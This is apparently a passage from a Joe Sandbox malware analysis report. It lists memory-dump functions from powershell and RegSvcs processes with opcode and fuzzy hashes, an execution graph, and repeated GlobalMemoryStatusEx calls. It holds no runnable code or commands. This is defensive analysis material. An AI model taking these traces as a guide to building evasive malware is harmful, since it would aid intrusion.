                                            • Instruction ID: 891dfe3e633c9f2f4b991036eb2b1a4f044c3b5687724c9f95da204f04e87d6e
                                            • Opcode Fuzzy Hash: 08bbf0ac43451d1a96530c57ae8ca3d1aec711a22fca05b70c77ce1b19c3c9f6
                                            • Instruction Fuzzy Hash: 3D413AA260E3890FE3999B744CA61B2BFE5EF9322070942BFD1C6C71E3D91858079352
                                            Function 00007FFD34885F28 Relevance: .1, Instructions: 119COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8b500e6c39538693af39543a37224bcc74e3420b4cbcbdf412d6788ced9107f4
                                            • Instruction ID: 289d7dc5c5cf0d8bde1b0f381e1282dc7b5c7bc39ed481db3065903772e32aac
                                            • Opcode Fuzzy Hash: 8b500e6c39538693af39543a37224bcc74e3420b4cbcbdf412d6788ced9107f4
                                            • Instruction Fuzzy Hash: 9231407270E6C90FE3A95B7C5C6A0B5BB85DF8332071542FFD6C5C60A7DD1968035145
                                            Function 00007FFD34882EFA Relevance: .1, Instructions: 111COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 099a8577ada3b248b89bce31d83658a11d0a3d1ac39e34cebc3028252b62682f
                                            • Instruction ID: af6c76fc909e819fe7405546ac19004b8ff1817f9a058484b7bcfd3d5db1d494
                                            • Opcode Fuzzy Hash: 099a8577ada3b248b89bce31d83658a11d0a3d1ac39e34cebc3028252b62682f
                                            • Instruction Fuzzy Hash: C83194A7A0DAC27BF7B543289CF61D927E4FF53364B4900B2CA85C6453EE0D1807E656
                                            Function 00007FFD3488EFD8 Relevance: .1, Instructions: 80COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c335263a4c124660dd59fc0d5272acf922dd80911591f7a3fdeebeced3436c80
                                            • Instruction ID: 5d2e64621717d6ebf6d1c96fb4dbb70014e84d2a72f4a7661ceb241ffd3292ce
                                            • Opcode Fuzzy Hash: c335263a4c124660dd59fc0d5272acf922dd80911591f7a3fdeebeced3436c80
                                            • Instruction Fuzzy Hash: 54115B72A0D2850FA32C8EA54C9A437BB99EB43250712537EE997C75E3DE649C039391
                                            Function 00007FFD34887A74 Relevance: .1, Instructions: 79COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: b84d3aec10accc462ff89cc44ee5e445d57fc73d39946ea4bbd9e82696ebeefc
                                            • Instruction ID: 7115ce0313a3030f121f699a249b483c1ad2a44b6eb04926f147a650f61ba8c8
                                            • Opcode Fuzzy Hash: b84d3aec10accc462ff89cc44ee5e445d57fc73d39946ea4bbd9e82696ebeefc
                                            • Instruction Fuzzy Hash: 0011E132B1C55D1F932C8A388C6A177779AD3C3610715837EE697C32D6ED689C0351C2
                                            Function 00007FFD348851B0 Relevance: .1, Instructions: 77COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2e0932490b5aca39ada48a42f343e32b60f019374d064be14236f59919ff5d51
                                            • Instruction ID: a7397e3fbe90c59936533de159b2f96ea09e915c159f71e7833a573bf0359a12
                                            • Opcode Fuzzy Hash: 2e0932490b5aca39ada48a42f343e32b60f019374d064be14236f59919ff5d51
                                            • Instruction Fuzzy Hash: 6A01453264D29C0FE32D8DB8AC470B7B75AD383230312927FD2D7C64A3ED6964131182

                                            Execution Graph

                                            Execution Coverage:15.2%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:50
                                            Total number of Limit Nodes:4
                                            execution_graph 11832 28818e0 11833 28818e4 11832->11833 11836 2881b78 11833->11836 11843 2881a61 11833->11843 11837 2881b4f 11836->11837 11838 2881b76 11837->11838 11850 2881f78 11837->11850 11854 2882018 11837->11854 11858 2881fbd 11837->11858 11862 288200a 11837->11862 11838->11833 11845 2881a9c 11843->11845 11844 2881b76 11844->11833 11845->11844 11846 2882018 GlobalMemoryStatusEx 11845->11846 11847 2881f78 GlobalMemoryStatusEx 11845->11847 11848 288200a GlobalMemoryStatusEx 11845->11848 11849 2881fbd GlobalMemoryStatusEx 11845->11849 11846->11845 11847->11845 11848->11845 11849->11845 11851 2881f7d 11850->11851 11866 2882c88 11851->11866 11852 288211e 11855 288203d 11854->11855 11857 2882c88 GlobalMemoryStatusEx 11855->11857 11856 288211e 11857->11856 11859 2881f7d 11858->11859 11859->11858 11861 2882c88 GlobalMemoryStatusEx 11859->11861 11860 288211e 11861->11860 11863 288203d 11862->11863 11865 2882c88 GlobalMemoryStatusEx 11863->11865 11864 288211e 11865->11864 11867 2882c8d 11866->11867 11871 2887de8 11867->11871 11875 2887df8 11867->11875 11868 288305a 11868->11852 11872 2887df8 11871->11872 11879 2888082 11872->11879 11873 2887e7f 11873->11868 11876 2887e1d 11875->11876 11878 2888082 GlobalMemoryStatusEx 11876->11878 11877 2887e7f 11877->11868 11878->11877 11883 28880b8 11879->11883 11888 28880c8 11879->11888 11880 288809e 11880->11873 11884 28880fd 11883->11884 11885 28880d5 11883->11885 11893 2887a14 11884->11893 11885->11880 11889 28880fd 11888->11889 11890 28880d5 11888->11890 11891 2887a14 GlobalMemoryStatusEx 11889->11891 11890->11880 11892 288811a 11891->11892 11892->11880 11894 28881a0 GlobalMemoryStatusEx 11893->11894 11896 288811a 11894->11896 11896->11880

                                            Executed Functions

                                            Function 028879F7 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 97 28879f7-28881de 99 28881e6-2888214 GlobalMemoryStatusEx 97->99 100 288821d-2888245 99->100 101 2888216-288821c 99->101 101->100
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0288811A), ref: 02888207
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4568032674.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_2880000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 329eacf0fe538535487a7e3dc063518b5e2f31d3e81ba7159cb3dc32f6b24d95
                                            • Instruction ID: f3ff688bbd2bde1d226d51dfcb884b6bafd1f7aaf9ded4b8b3813d3f9d3bcb6d
                                            • Opcode Fuzzy Hash: 329eacf0fe538535487a7e3dc063518b5e2f31d3e81ba7159cb3dc32f6b24d95
                                            • Instruction Fuzzy Hash: 692178B5C0065ACFCB10DF9AC884BEEBBB4BF08324F14815AD514B7241D3B86911CFA4
                                            Function 02887A14 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 104 2887a14-2888214 GlobalMemoryStatusEx 107 288821d-2888245 104->107 108 2888216-288821c 104->108 108->107
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0288811A), ref: 02888207
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4568032674.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_2880000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 555d28f10e38add083a9a97ffc02b226c7927df19c77f694896d867ae811a37c
                                            • Instruction ID: 246a1868a15b7f97f84974a01f9008861b0e2ffed9a564b27919c0bea1268bf6
                                            • Opcode Fuzzy Hash: 555d28f10e38add083a9a97ffc02b226c7927df19c77f694896d867ae811a37c
                                            • Instruction Fuzzy Hash: 2A1136B5C0065ADFDB10DF9AC54479EFBF4BF48220F10816AE518B7240D378A950CFA5
                                            Function 0288819A Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 111 288819a-28881de 112 28881e6-2888214 GlobalMemoryStatusEx 111->112 113 288821d-2888245 112->113 114 2888216-288821c 112->114 114->113
                                            APIs
                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,0288811A), ref: 02888207
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4568032674.0000000002880000.00000040.00000800.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_2880000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: GlobalMemoryStatus
                                            • String ID:
                                            • API String ID: 1890195054-0
                                            • Opcode ID: 7c74dd27c1ba803f42d6e73ce4cce98cf92903bf8d38056012e3784ff9a4e0b1
                                            • Instruction ID: 681055066024c320a28b5059a6419af27837ac1b6059dfbcc997b43dc1bf6f0c
                                            • Opcode Fuzzy Hash: 7c74dd27c1ba803f42d6e73ce4cce98cf92903bf8d38056012e3784ff9a4e0b1
                                            • Instruction Fuzzy Hash: 861133B5C0065ACFDB10CFAAC444BDEFBB4BF48320F10826AD518A7240D378A954CFA1
                                            Function 0103D400 Relevance: .1, Instructions: 75COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4567503370.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_103d000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9c5c1406ca877710a49079974faf4c722415fd3f891709c4c5e95bbd937f14bc
                                            • Instruction ID: 0cdec50dd0a5ad39f9e62113f746b8724a122d825845a7019fb3c109d307f023
                                            • Opcode Fuzzy Hash: 9c5c1406ca877710a49079974faf4c722415fd3f891709c4c5e95bbd937f14bc
                                            • Instruction Fuzzy Hash: 30213372504204DFDB05DF54D9C0B6ABFAAFBC8320F60C1ADE9490A257CB36E456CBA1
                                            Function 0103D3FB Relevance: .1, Instructions: 56COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.4567503370.000000000103D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0103D000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_103d000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                            • Instruction ID: 70b62a60081e27a89c2ec78c7b332900904a018b9b9c287f94634afe43c163ae
                                            • Opcode Fuzzy Hash: fed46cca7f742b7caa711e8ed735342f41d2c2d3303e466d284e334843d61363
                                            • Instruction Fuzzy Hash: DB11AF76504284CFCB16CF54D5C4B56BFA2FB84324F24C5A9D8490B657C33AE456CBA1